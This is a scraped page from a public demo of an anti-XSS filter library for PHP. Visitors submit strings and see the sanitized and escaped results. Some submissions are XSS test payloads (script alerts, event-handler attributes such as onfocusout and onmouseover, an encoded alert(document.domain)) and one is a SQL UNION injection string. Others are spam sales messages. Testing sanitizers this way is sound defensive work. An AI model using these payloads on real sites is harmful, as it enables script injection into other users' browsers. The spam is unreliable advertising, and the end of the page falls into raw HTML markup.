Anti-XSS for PHP

{ @hacker | "try to bypass this XSS filter" }

github.com/voku/anti-xss



If you need some inspiration for new attacks, take a look at the PHPUnit tests. I have already included test from e.g. "DOMPurify", "JS-XSS" and "LaravelSecurity". Here you can find some more XSS strings:



PS: This demo, is also available at github.com and you can also create pull-requests, here.


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Need Business Leads in 152 countries?\\r\\n\\r\\nWe are having a shut down sale!\\r\\n\\r\\ntinyurl.com/ShutDownDeal

result with twig: {{ xss.xss | escape }}:

Need Business Leads in 152 countries?\\r\\n\\r\\nWe are having a shut down sale!\\r\\n\\r\\ntinyurl.com/ShutDownDeal

keyword(s):

description: Need Business Leads in 152 countries?\\r\\n\\r\\nWe are having a shut down sale!\\r\\n\\r\\ntinyurl.com/ShutDownDeal

by Julissa Rivero | at 2021-12-01 07:16:20


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Hi,\\r\\n\\r\\nWe\\\'d like to introduce to you our explainer video service which we feel can benefit your site anti-xss-demo.suckup.de.\\r\\n\\r\\nCheck out some of our existing videos here:\\r\\nhttps://www.youtube.com/watch?v=ivTmAwuli14\\r\\nhttps://www.youtube.com/watch?v=uywKJQvfeAM\\r\\nhttps://www.youtube.com/watch?v=oPNdmMo40pI\\r\\nhttps://www.youtube.com/watch?v=6gRb-HPo_ck\\r\\n\\r\\nAll of our videos are in a similar animated format as the above examples and we have voice over artists with US/UK/Australian accents.\\r\\nWe can also produce voice overs in languages other than English.\\r\\n\\r\\nThey can show a solution to a problem or simply promote one of your products or services. They are concise, can be uploaded to video such as Youtube, and can be embedded into your website or featured on landing pages.\\r\\n\\r\\nOur prices are as follows depending on video length:\\r\\n1 minute = $239\\r\\n1-2 minutes = $339\\r\\n2-3 minutes = $449\\r\\n\\r\\n*All prices above are in USD and include an engaging, captivating video with full script and voice-over.\\r\\n\\r\\nIf this is something you would like to discuss further, don\\\'t hesitate to get in touch.\\r\\nIf you are not interested, simply delete this message and we won\\\'t contact you again.\\r\\n\\r\\nKind Regards,\\r\\nSteve

result with twig: {{ xss.xss | escape }}:

Hi,\\r\\n\\r\\nWe\\\'d like to introduce to you our explainer video service which we feel can benefit your site anti-xss-demo.suckup.de.\\r\\n\\r\\nCheck out some of our existing videos here:\\r\\nhttps://www.youtube.com/watch?v=ivTmAwuli14\\r\\nhttps://www.youtube.com/watch?v=uywKJQvfeAM\\r\\nhttps://www.youtube.com/watch?v=oPNdmMo40pI\\r\\nhttps://www.youtube.com/watch?v=6gRb-HPo_ck\\r\\n\\r\\nAll of our videos are in a similar animated format as the above examples and we have voice over artists with US/UK/Australian accents.\\r\\nWe can also produce voice overs in languages other than English.\\r\\n\\r\\nThey can show a solution to a problem or simply promote one of your products or services. They are concise, can be uploaded to video such as Youtube, and can be embedded into your website or featured on landing pages.\\r\\n\\r\\nOur prices are as follows depending on video length:\\r\\n1 minute = $239\\r\\n1-2 minutes = $339\\r\\n2-3 minutes = $449\\r\\n\\r\\n*All prices above are in USD and include an engaging, captivating video with full script and voice-over.\\r\\n\\r\\nIf this is something you would like to discuss further, don\\\'t hesitate to get in touch.\\r\\nIf you are not interested, simply delete this message and we won\\\'t contact you again.\\r\\n\\r\\nKind Regards,\\r\\nSteve

keyword(s):

description: Hi,\\r\\n\\r\\nWe\\\'d like to introduce to you our explainer video service which we feel can benefit your site anti-xss-demo.suckup.de.\\r\\n\\r\\nCheck out some of our existing videos here:\\r\\nhttps://www.youtube.com/watch?v=oYoUQjxvhA0\\r\\nhttps://www.youtube.com/watch?v=MOnhn77TgDE\\r\\nhttps://www.youtube.com/watch?v=NKY4a3hvmUc\\r\\n\\r\\nAll of our videos are in a similar animated format as the above examples and we have voice over artists with US/UK/Australian accents.\\r\\n\\r\\nThey can show a solution to a problem or simply promote one of your products or services. They are concise, can be uploaded to video such as Youtube, and can be embedded into your website or featured on landing pages.\\r\\n\\r\\nOur prices are as follows depending on video length:\\r\\n1 minute = $239\\r\\n1-2 minutes = $339\\r\\n2-3 minutes = $449\\r\\n\\r\\n*All prices above are in USD and include an engaging, captivating video with full script and voice-over.\\r\\n\\r\\nIf this is something you would like to discuss further, don\\\'t hesitate to get in touch.\\r\\nIf you are not interested, simply delete this message and we won\\\'t contact you again.\\r\\n\\r\\nKind Regards,\\r\\nSteve

by Steve Watson | at 2021-11-25 23:02:16


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert(\\\'ola\\\')</script>

keyword(s): teste

description: ola

by fernando | at 2021-11-25 14:11:21


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Fernando +1 R$@oter

result with twig: {{ xss.xss | escape }}:

Fernando +1 R$@oter

keyword(s): seila + ou - igual =$#

description: Teste

by Fernando +1 R$@oter | at 2021-11-25 14:10:06


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

asdsadass%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 asdasdasd

result with twig: {{ xss.xss | escape }}:

asdsadass%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 asdasdasd

keyword(s): asd

description: asd

by Asda | at 2021-11-24 13:32:42


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

asdasdas

result with twig: {{ xss.xss | escape }}:

asdasdas

keyword(s): asd

description: ads

by asda | at 2021-11-24 13:31:32


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

bchbk

result with twig: {{ xss.xss | escape }}:

bchbk

keyword(s): book

description: xys

by Namrata | at 2021-11-21 12:34:59


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Hi there,\\r\\n\\r\\nTurnkey Chat Software & Trained Live Chat Agents 24/7 for Your Industry. Request a Demo! Boost Your Leads, Engage Your Prospects & Take Your Customer Service to a New Level. Easy Setup. App for iOs & Android. Click here: https://crotonz.com/livechat/\\r\\n\\r\\nAffordable & Professional Web Development - Wordpress/ Woocommerce/ Shopify and Custom Web development. Highly Experienced and Certified. Know More: https://crotonz.com/website-design-virtual-assistant.php\\r\\n\\r\\nKind Regards,\\r\\nSam Miller\\r\\ninfo@crotonz.com

result with twig: {{ xss.xss | escape }}:

Hi there,\\r\\n\\r\\nTurnkey Chat Software & Trained Live Chat Agents 24/7 for Your Industry. Request a Demo! Boost Your Leads, Engage Your Prospects & Take Your Customer Service to a New Level. Easy Setup. App for iOs & Android. Click here: https://crotonz.com/livechat/\\r\\n\\r\\nAffordable & Professional Web Development - Wordpress/ Woocommerce/ Shopify and Custom Web development. Highly Experienced and Certified. Know More: https://crotonz.com/website-design-virtual-assistant.php\\r\\n\\r\\nKind Regards,\\r\\nSam Miller\\r\\ninfo@crotonz.com

keyword(s):

description: Hi there,\\r\\n\\r\\nTurnkey Chat Software & Trained Live Chat Agents 24/7 for Your Industry. Request a Demo! Boost Your Leads, Engage Your Prospects & Take Your Customer Service to a New Level. Easy Setup. App for iOs & Android. Click here: https://crotonz.com/livechat/\\r\\n\\r\\nAffordable & Professional Web Development - Wordpress/ Woocommerce/ Shopify and Custom Web development. Highly Experienced and Certified. Know More: https://crotonz.com/website-design-virtual-assistant.php\\r\\n\\r\\nKind Regards,\\r\\nSam Miller\\r\\ninfo@crotonz.com

by Heather Lynas | at 2021-11-20 03:22:16


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

\\r\\nqweqweqw

result with twig: {{ xss.xss | escape }}:

<script>alert(\\\'haha\\\');</script>\\r\\n<b>qweqweqw</b>

keyword(s):

description:

by | at 2021-11-19 11:29:56


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert(\\\'haha\\\');</script>

keyword(s):

description:

by | at 2021-11-19 11:29:03


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

" =window['\\\alert'](document.domain)

result with twig: {{ xss.xss | escape }}:

%22%20onwheel%3dwindow%5b%27\\\\u0061lert%27%5d(document.domain)

keyword(s): test

description:

by test | at 2021-11-10 01:42:28


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

i there\\\\\\\\r\\\\\\\\nHow would

result with twig: {{ xss.xss | escape }}:

i there\\\\\\\\r\\\\\\\\nHow would

keyword(s): ddfdf

description:

by dfdfdf | at 2021-11-10 01:41:14


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Hi there\\r\\nHow would you like to grab more visibility for your YT videos at no advertisment costs.\\r\\nAll organically\\r\\n\\r\\nWe have built a special plan for ranking YT videos, check it out here:\\r\\nhttps://www.seo-treff.de/product/youtube-seo-package/\\r\\n\\r\\nThanks and regards\\r\\n\\r\\nMichel\\r\\nsupport@seo-treff.de

result with twig: {{ xss.xss | escape }}:

Hi there\\r\\nHow would you like to grab more visibility for your YT videos at no advertisment costs.\\r\\nAll organically\\r\\n\\r\\nWe have built a special plan for ranking YT videos, check it out here:\\r\\nhttps://www.seo-treff.de/product/youtube-seo-package/\\r\\n\\r\\nThanks and regards\\r\\n\\r\\nMichel\\r\\nsupport@seo-treff.de

keyword(s):

description: Hi there\\r\\nHow would you like to grab more visibility for your YT videos at no advertisment costs.\\r\\nAll organically\\r\\n\\r\\nWe have built a special plan for ranking YT videos, check it out here:\\r\\nhttps://www.seo-treff.de/product/youtube-seo-package/\\r\\n\\r\\nThanks and regards\\r\\n\\r\\nMichel\\r\\nsupport@seo-treff.de

by Marcela MacRory | at 2021-11-09 19:48:52


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

test

result with twig: {{ xss.xss | escape }}:

test

keyword(s): qwd

description: qwd

by qwd | at 2021-11-08 14:45:58


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

uihj

result with twig: {{ xss.xss | escape }}:

uihj

keyword(s): ko

description: 768t

by kolpjm | at 2021-10-30 19:36:31


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script></script>

keyword(s):

description:

by sd | at 2021-10-30 11:24:07


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

We have a one time limited offer.\\r\\n\\r\\n366,295,395 Leads for $20!\\r\\n\\r\\nBusinessLeads101.com!

result with twig: {{ xss.xss | escape }}:

We have a one time limited offer.\\r\\n\\r\\n366,295,395 Leads for $20!\\r\\n\\r\\nBusinessLeads101.com!

keyword(s):

description: We have a one time limited offer.\\r\\n\\r\\n366,295,395 Leads for $20!\\r\\n\\r\\nBusinessLeads101.com!

by Kacey Towner | at 2021-10-26 16:34:05


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Hi ,\\r\\n\\r\\nWho would I contact at your company that handles ordering your logo products, t-shirts, and promotional items?\\r\\n\\r\\nFor over 20 years we have been creating and supplying our clients with all their custom logo merchandise.\\r\\n\\r\\nWe can put your logo onto anything including:\\r\\n\\r\\n-Custom Printed T-shirts / Hoodies\\r\\n-Pens \\r\\n-Mugs \\r\\n-T-shirts \\r\\n-Bags \\r\\n-Banners \\r\\n-Table Covers \\r\\n-Key chains \\r\\n-USB flash drives \\r\\n\\r\\n---plus 350,000 other items!\\r\\n\\r\\nWe also offer PPE items such as hand sanitizer and masks.\\r\\n\\r\\nAre there any upcoming projects that you need logo items for?\\r\\n\\r\\nThanks in advance for your time.\\r\\n\\r\\nRegards,\\r\\n\\r\\nMuhammad\\r\\nCustom Branded Product Specialist

result with twig: {{ xss.xss | escape }}:

Hi ,\\r\\n\\r\\nWho would I contact at your company that handles ordering your logo products, t-shirts, and promotional items?\\r\\n\\r\\nFor over 20 years we have been creating and supplying our clients with all their custom logo merchandise.\\r\\n\\r\\nWe can put your logo onto anything including:\\r\\n\\r\\n-Custom Printed T-shirts / Hoodies\\r\\n-Pens \\r\\n-Mugs \\r\\n-T-shirts \\r\\n-Bags \\r\\n-Banners \\r\\n-Table Covers \\r\\n-Key chains \\r\\n-USB flash drives \\r\\n\\r\\n---plus 350,000 other items!\\r\\n\\r\\nWe also offer PPE items such as hand sanitizer and masks.\\r\\n\\r\\nAre there any upcoming projects that you need logo items for?\\r\\n\\r\\nThanks in advance for your time.\\r\\n\\r\\nRegards,\\r\\n\\r\\nMuhammad\\r\\nCustom Branded Product Specialist

keyword(s):

description: Hi ,\\r\\n\\r\\nWho would I contact at your company that handles ordering your logo products, t-shirts, and promotional items?\\r\\n\\r\\nFor over 20 years we have been creating and supplying our clients with all their custom logo merchandise.\\r\\n\\r\\nWe can put your logo onto anything including:\\r\\n\\r\\n-Custom Printed T-shirts / Hoodies\\r\\n-Pens \\r\\n-Mugs \\r\\n-T-shirts \\r\\n-Bags \\r\\n-Banners \\r\\n-Table Covers \\r\\n-Key chains \\r\\n-USB flash drives \\r\\n\\r\\n---plus 350,000 other items!\\r\\n\\r\\nWe also offer PPE items such as hand sanitizer and masks.\\r\\n\\r\\nAre there any upcoming projects that you need logo items for?\\r\\n\\r\\nThanks in advance for your time.\\r\\n\\r\\nRegards,\\r\\n\\r\\nMuhammad\\r\\nCustom Branded Product Specialist

by Muhammad Chaffin | at 2021-10-26 02:27:32


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

XSS

result with twig: {{ xss.xss | escape }}:

<acronym onpointerrawupdate=alert(137)>XSS</acronym>

keyword(s):

description:

by asd | at 2021-10-24 22:00:28


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

\\r\\n\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\n\\r\\n\\r\\ntest\\r\\ntest\\r\\n<input autofocus>\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\n<input autofocus>\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\nrequires scrolling\\r\\ntest\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\nrequires scrolling\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\n\\r\\n\\r\\ntest\\r\\ntest\\r\\n<input autofocus>\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\n<input autofocus>\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\nrequires scrolling\\r\\ntest\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\n\\r\\n\\r\\ntest\\r\\ntest\\r\\n<input autofocus>\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\n<input autofocus>\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\nrequires scrolling\\r\\ntest\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\n
test
\\r\\n
test
\\r\\n
test
\\r\\n
test
\\r\\n
test
\\r\\n
\\r\\n
\\r\\n
test
\\r\\n
test
\\r\\n
<input autofocus>\\r\\n
test
\\r\\n
test
\\r\\n
test\\r\\n
test\\r\\n
test
\\r\\n
<input autofocus>\\r\\n
test
\\r\\n
test
\\r\\n
test
\\r\\n
test
\\r\\n
test
\\r\\n
test
\\r\\n
test
\\r\\n
test
\\r\\n
test
\\r\\n
test
\\r\\n
requires scrolling\\r\\n
test
\\r\\n
XSS
\\r\\n
XSS
\\r\\n
XSS
\\r\\n
XSS
\\r\\n
XSS
\\r\\n
XSS
\\r\\n
XSS
\\r\\n
XSS
\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\nrequires scrolling\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\nrequires scrolling\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\nrequires scrolling\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\n<applet draggable=\\\"true\\\" >test</applet>\\r\\n<applet draggable=\\\"true\\\" >test</applet>\\r\\n<applet draggable=\\\"true\\\" >test</applet>\\r\\n<applet draggable=\\\"true\\\" >test</applet>\\r\\n<applet draggable=\\\"true\\\" >test</applet>\\r\\n<applet id=x tabindex=1 ></applet>\\r\\n<applet id=x tabindex=1 ></applet>\\r\\n<applet contenteditable>test</applet>\\r\\n<applet contenteditable>test</applet>\\r\\n<applet tabindex=1 id=x></applet><input autofocus>\\r\\n<applet >test</applet>\\r\\n<applet >test</applet>\\r\\n<applet value=\\\"XSS\\\" autofocus tabindex=1>test\\r\\n<applet value=\\\"XSS\\\" autofocus tabindex=1>test\\r\\n<applet autofocus tabindex=1>test</applet>\\r\\n<applet tabindex=1 id=x></applet><input autofocus>\\r\\n<applet contenteditable>test</applet>\\r\\n<applet contenteditable>test</applet>\\r\\n<applet contenteditable>test</applet>\\r\\n<applet >test</applet>\\r\\n<applet >test</applet>\\r\\n<applet >test</applet>\\r\\n<applet >test</applet>\\r\\n<applet >test</applet>\\r\\n<applet >test</applet>\\r\\n<applet >test</applet>\\r\\n<applet >requires scrolling\\r\\n<applet contenteditable>test</applet>\\r\\n<applet >XSS</applet>\\r\\n<applet >XSS</applet>\\r\\n<applet >XSS</applet>\\r\\n<applet >XSS</applet>\\r\\n<applet >XSS</applet>\\r\\n<applet >XSS</applet>\\r\\n<applet onpointerrawupdate=alert(296)>XSS</applet>\\r\\n<applet >XSS</applet>\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\n<input autofocus>\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\n<input autofocus>\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\nrequires scrolling\\r\\ntest\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\nXSS\\r\\n
test
\\r\\n
test
\\r\\n
test
\\r\\n
test
\\r\\n
test
\\r\\n
\\r\\n
\\r\\n
test
\\r\\n
test
\\r\\n
<input autofocus>\\r\\n
test
\\r\\n
test
\\r\\n
test\\r\\n
test\\r\\n
test
\\r\\n
<input autofocus>\\r\\n
test
\\r\\n
test
\\r\\n
test
\\r\\n
test
\\r\\n
test
\\r\\n
test
\\r\\n
test
\\r\\n
test
\\r\\n
test
\\r\\n
test
\\r\\n
requires scrolling\\r\\n
test
\\r\\n
XSS
\\r\\n
XSS
\\r\\n
XSS
\\r\\n
XSS
\\r\\n
XSS
\\r\\n
XSS
\\r\\n
XSS
\\r\\n
XSS
\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n<input autofocus>\\r\\n\\r\\n\\r\\n

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Hi there,\\r\\n\\r\\nTurnkey Chat Software & Trained Live Chat Agents 24/7 for Your Industry. Request a Demo! Boost Your Leads, Engage Your Prospects & Take Your Customer Service to a New Level. Easy Setup. App for iOs & Android. Click here: https://crotonz.com/livechat/\\r\\n\\r\\nAffordable & Professional Web Development - Wordpress/ Woocommerce/ Shopify and Custom Web development. Highly Experienced and Certified. Know More: https://crotonz.com/website-design-virtual-assistant.php\\r\\n\\r\\nKind Regards,\\r\\nSam Miller\\r\\ninfo@crotonz.com

result with twig: {{ xss.xss | escape }}:

Hi there,\\r\\n\\r\\nTurnkey Chat Software & Trained Live Chat Agents 24/7 for Your Industry. Request a Demo! Boost Your Leads, Engage Your Prospects & Take Your Customer Service to a New Level. Easy Setup. App for iOs & Android. Click here: https://crotonz.com/livechat/\\r\\n\\r\\nAffordable & Professional Web Development - Wordpress/ Woocommerce/ Shopify and Custom Web development. Highly Experienced and Certified. Know More: https://crotonz.com/website-design-virtual-assistant.php\\r\\n\\r\\nKind Regards,\\r\\nSam Miller\\r\\ninfo@crotonz.com

keyword(s):

description: Hi there,\\r\\n\\r\\nTurnkey Chat Software & Trained Live Chat Agents 24/7 for Your Industry. Request a Demo! Boost Your Leads, Engage Your Prospects & Take Your Customer Service to a New Level. Easy Setup. App for iOs & Android. Click here: https://crotonz.com/livechat/\\r\\n\\r\\nAffordable & Professional Web Development - Wordpress/ Woocommerce/ Shopify and Custom Web development. Highly Experienced and Certified. Know More: https://crotonz.com/website-design-virtual-assistant.php\\r\\n\\r\\nKind Regards,\\r\\nSam Miller\\r\\ninfo@crotonz.com

by Kerry Gartrell | at 2021-10-24 20:11:00


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>confirm();</script>

keyword(s):

description:

by asdasd | at 2021-10-24 14:51:03


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

test\\r\\ntest\\r\\ntest\\r\\n\\r\\n<xmp tabindex=1 id=x><input autofocus>\\r\\ntest\\r\\ntest\\r\\ntest\\r\\n<xmp value=\\\"XSS\\\" autofocus tabindex=1>test\\r\\n<xmp autofocus tabindex=1>test\\r\\n<input autofocus>\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\ntest\\r\\nrequires scrolling</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">&lt;xmp onbeforecopy=\\\&quot;alert(1)\\\&quot; contenteditable&gt;test&lt;/xmp&gt;\\r\\n&lt;xmp onbeforecut=\\\&quot;alert(1)\\\&quot; contenteditable&gt;test&lt;/xmp&gt;\\r\\n&lt;xmp onbeforepaste=\\\&quot;alert(1)\\\&quot; contenteditable&gt;test&lt;/xmp&gt;\\r\\n&lt;xmp onbeforescriptexecute=alert(1)&gt;&lt;script&gt;1&lt;/script&gt;\\r\\n&lt;xmp onblur=alert(1) tabindex=1 id=x&gt;&lt;/xmp&gt;&lt;input autofocus&gt;\\r\\n&lt;xmp onclick=\\\&quot;alert(1)\\\&quot;&gt;test&lt;/xmp&gt;\\r\\n&lt;xmp oncontextmenu=\\\&quot;alert(1)\\\&quot;&gt;test&lt;/xmp&gt;\\r\\n&lt;xmp oncopy=alert(1) value=\\\&quot;XSS\\\&quot; autofocus tabindex=1&gt;test\\r\\n&lt;xmp oncut=alert(1) value=\\\&quot;XSS\\\&quot; autofocus tabindex=1&gt;test\\r\\n&lt;xmp ondblclick=\\\&quot;alert(1)\\\&quot; autofocus tabindex=1&gt;test&lt;/xmp&gt;\\r\\n&lt;xmp onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/xmp&gt;&lt;input autofocus&gt;\\r\\n&lt;xmp onkeydown=\\\&quot;alert(1)\\\&quot; contenteditable&gt;test&lt;/xmp&gt;\\r\\n&lt;xmp onkeypress=\\\&quot;alert(1)\\\&quot; contenteditable&gt;test&lt;/xmp&gt;\\r\\n&lt;xmp onkeyup=\\\&quot;alert(1)\\\&quot; contenteditable&gt;test&lt;/xmp&gt;\\r\\n&lt;xmp onmousedown=\\\&quot;alert(1)\\\&quot;&gt;test&lt;/xmp&gt;\\r\\n&lt;xmp onmouseenter=\\\&quot;alert(1)\\\&quot;&gt;test&lt;/xmp&gt;\\r\\n&lt;xmp onmouseleave=\\\&quot;alert(1)\\\&quot;&gt;test&lt;/xmp&gt;\\r\\n&lt;xmp onmousemove=\\\&quot;alert(1)\\\&quot;&gt;test&lt;/xmp&gt;\\r\\n&lt;xmp onmouseout=\\\&quot;alert(1)\\\&quot;&gt;test&lt;/xmp&gt;\\r\\n&lt;xmp onmouseover=\\\&quot;alert(1)\\\&quot;&gt;test&lt;/xmp&gt;\\r\\n&lt;xmp onmouseup=\\\&quot;alert(1)\\\&quot;&gt;test&lt;/xmp&gt;\\r\\n&lt;xmp onmousewheel=alert(1)&gt;requires scrolling</code> <p>keyword(s): </p> <p>description: </p> <p>by asdasd | at 2021-10-24 14:45:13</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word"><ul tabindex=1 id=x></ul>&lt;input autofocus&gt;</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">&lt;ul onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/ul&gt;&lt;input autofocus&gt;</code> <p>keyword(s): </p> <p>description: </p> <p>by dasdas | at 2021-10-24 14:44:56</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word"><ul tabindex=1 id=x></ul>&lt;input autofocus&gt;</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">&lt;ul onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/ul&gt;&lt;input autofocus&gt;</code> <p>keyword(s): </p> <p>description: </p> <p>by asd | at 2021-10-24 14:44:22</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word"><ul tabindex=1 id=x></ul>&lt;input autofocus&gt;</code> <p>result with twig: 